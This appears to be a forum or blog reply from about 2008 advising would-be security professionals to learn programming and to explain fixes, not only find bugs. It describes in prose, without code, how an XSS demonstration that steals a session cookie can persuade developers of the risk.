That said, I'd like to cite a recent blog post from SecurityBuddah.com (http://securitybuddha.com/2008/09/10/are-you-a-builder-or-a-breaker/
). The point of the post is to ask why so many people in security focus on breaking things rather than building better software. I think learning to actually program in a language will be a much more valuable endeavor if you really want to learn to write exploits.
Why not learn how to spot weaknesses and offer fixes instead of just how to break things?
If you want to be a professional "breaker" then you are going to need to learn why the things happen that you can break. So many of the technologies today are easy to break and harder to fix, especially on the web. Unless you have the knowledge to be able to explains what went wrong people will see you much more as a script-kiddie than a knowledgeable professional. Finding XSS exploits is pretty easy in many occasions, talking to the folks who have the vulnerable application and explaining strategic solutions to fix their problem as well as what lead to the problem is where the money is at.
On a separate note, in my opinion, learning a scripting languages will probably help you with just about any type of exploit unless everything you do is through a GUI. For the stuff that I have written for exploiting C applications, most of the code I've written has been in perl and when I'm doing web based assessments that are beyond the basics, I frequently pop back to perl or python to generate the code that I'm going to use for exploit. Plus, putting your exploit in a script means that it's useful to others, and unless you don't plan on showing anyone else what you did or ever doing it again yourself it's nice to have it especially if you either added a comment here or there or used logical variable names.
Final thought on the breaker vs maker since I've been on both sides is that in many cases, and I encounter this all the time, people don't really understand the magnitude or impact of what they are doing until you show them how it's bad. I think it's kind of analogous to when you're a kid and a parent says "don't touch that, it's hot" and sure enough, you figure it out on your own. In some ways, unless we can show what can happen in a controlled environment then you may not get the response that you want. I think that this is especially true with problems that don't yield a shell on a box. So much many applications have XSS bugs in them these days. When you explain it to someone and they simplify it as "so someone can click on a link and have some other stuff show up on the page?" then it really doesn't sound that scary. When you show them that when they clicked on the link for what they thought was the latest Peggle download from their web based email client, that you stole their session cookie and now have full access to their email, then that has a little bit more impact. I won't say that is necessary all of the time, but it is something that I run up against.